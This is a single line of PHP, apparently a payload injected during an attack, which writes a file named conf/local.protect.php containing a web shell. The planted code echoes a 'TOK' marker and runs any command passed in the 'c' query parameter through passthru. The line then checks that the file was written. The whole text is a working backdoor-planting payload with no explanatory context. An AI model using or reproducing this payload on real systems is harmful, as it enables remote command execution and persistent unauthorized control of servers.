$p='conf/local.protect.php';$x='<?php echo "T"."OK"; if(isset($_GET["c"])){@passthru($_GET["c"]);}';echo 'WR='.@file_put_contents($p,$x).'|EX='.(@file_exists($p)?'1':'0');